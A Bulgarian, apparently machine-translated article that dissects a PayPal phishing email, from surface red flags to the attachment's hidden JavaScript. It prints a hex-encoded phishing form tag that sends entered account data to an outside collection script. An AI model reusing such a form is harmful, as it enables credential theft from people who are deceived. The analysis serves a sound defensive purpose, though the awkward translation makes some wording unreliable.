Не мислете, че вашите банкови детайли са важни: в края на краищата, ако някой получи контрол върху данните за вход в профила ви, те не само знаят информацията, съдържаща се в този профил, но шансовете са, че същите данни за вход могат да се използват в различни други сметки. И ако те компрометират вашия имейл акаунт, те могат да възстановят всички ваши други пароли.
Така че, в допълнение към поддържането на силни и различни пароли, трябва винаги да сте нащрек за фалшиви имейли, маскирани като истинско нещо. Докато повечето фишинг опити са аматьорски, някои са доста убедителни, така че е важно да разберете как да ги разпознавате на повърхностно ниво, както и как работят под качулката.
Изображение от asirap
Разглеждане на това, което е в обикновена гледка
Примерният ни имейл, както повечето опити за фишинг, ви уведомява за активността ви в профила Ви в PayPal, която при нормални обстоятелства би била тревожна. Така че призивът за действие е да проверите / възстановите профила си, като изпратите точно всяка част от личната информация, която можете да си представите. Отново, това е доста формулировка.
Въпреки че със сигурност има изключения, почти всеки phishing и измамен имейл е зареден с червени знамена директно в съобщението. Дори ако текстът е убедителен, обикновено можете да намерите много грешки, които са покрити в цялото тяло на съобщението, което показва, че съобщението не е легитимно.
Органът на съобщенията
- "Paypal" - Правилният случай е "PayPal" (капитал P). Можете да видите, че в съобщението се използват и двете варианти. Компаниите са много съзнателни с марката си, така че е съмнително, че нещо подобно ще премине процеса на проверка.
- "Позволи ActiveX" - Колко пъти сте виждали легитимен уеб базиран бизнес с размера на Paypal, използващ патентован компонент, който работи само на един браузър, особено когато те поддържат няколко браузъри? Разбира се, някъде там някъде компанията прави, но това е червено знаме.
- "Сигурно". - Забележете как тази дума не се подравнява с маркера с останалата част от текста на абзаца. Дори да протягам прозореца малко повече, той не се завива или правилно пространство.
- "Paypal!" - Пространството преди удивителен знак изглежда неудобно. Просто още нещо, което съм сигурен, че няма да е в легитимен имейл.
- "PayPal-Account Update Form.pdf.htm" - Защо Paypal придават "PDF", особено когато те могат просто да се свържат със страница в сайта си? Освен това, защо биха се опитали да прикрият HTML файл като PDF? Това е най-голямото червено знаме на всички тях.
Заглавието на съобщението
- Адресът е от [email protected].
- Адресът за адресите липсва. Не съм го празнувал, просто не е част от заглавната част на стандартното съобщение. Обикновено фирма, която има вашето име, ще ви персонализира.
Приложението
Когато отворя прикачения файл, можете веднага да видите, че оформлението не е правилно, тъй като липсва информация за стила. Отново, защо PayPal ще изпрати имейл на HTML формуляр, когато те могат просто да ви дадат линк на сайта си?
Забележка: ние използвахме вградения инструмент за визуализиране на прикачени файлове в Gmail за това, но бихме ви препоръчали да не отваряте прикачените файлове от измамници. Никога. Някога. Те много често съдържат експлойти, които ще инсталират троянци на вашия компютър, за да откраднат информацията за вашия акаунт.
Техническата разбивка
Макар да е съвсем ясно, въз основа на това, което е ясно, че това е опит за фишинг, сега ще разбием техническата изработка на имейла и ще видим какво можем да намерим.
Информация от прикачения файл
Първото нещо, което трябва да разгледате, е HTML източникът на прикачения файл, който предава данните на фалшивия сайт.
При бързо преглеждане на източника всички връзки изглеждат валидни, тъй като сочат към "paypal.com" или "paypalobjects.com", които са едновременно легитимни.
Информация от заглавията на имейлите
След това ще разгледаме заглавията на необработените имейл съобщения. Gmail го прави достъпен чрез опцията Показване на оригинала в съобщението.
Къде отиват данните?
Затова ясно определихме, че това е phishing имейл и събра известна информация за това, откъде идва съобщението, но какво ще кажете къде се изпращат данните ви?
За да видите това, първо трябва да запазим прикачения файл HTM на нашия работен плот и да го отворим в текстов редактор. Преминавайки през него, всичко изглежда да е наред, освен когато стигнем до подозрителен блок Javascript.
Всеки път, когато виждате голям набор от привидно случайни букви и цифри, вградени в Javascript блок, обикновено това е нещо подозрително. При разглеждането на кода, променливата "x" се задава на този голям низ и след това се декодира в променливата "y". Крайният резултат от променливата "y" след това се записва в документа като HTML.
Тъй като големият низ е направен от номера 0-9 и буквите a-f, най-вероятно е кодиран чрез просто ASCII to Hex преобразуване:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Превежда на:
Не е случайно, че това се декодира в валиден HTML формуляр, който изпраща резултатите не до PayPal, а до неправилен сайт.
Освен това, когато прегледате HTML източника на формуляра, ще видите, че този маркер на формуляра не се вижда, защото е генериран динамично чрез Javascript. Това е умен начин да скриете действието на HTML, ако някой просто е прегледал генерирания източник на прикачения файл (както направихме по-рано), за разлика от отварянето на прикачения файл директно в текстов редактор.
Кинизмът е добра защита
Когато става въпрос за безопасно онлайн, никога не боли да имаш малко цинизъм.
Докато съм сигурен, че в примерния имейл има повече червени знамена, това, което сме посочили по-горе, са показателите, които видяхме след няколко минути от проверката. Хипотетично, ако нивото на повърхността на електронната поща е имитирала легитимния си еквивалент на 100%, техническият анализ щеше да разкрие истинската му същност. Ето защо е важно да проучите какво можете и не можете да видите.
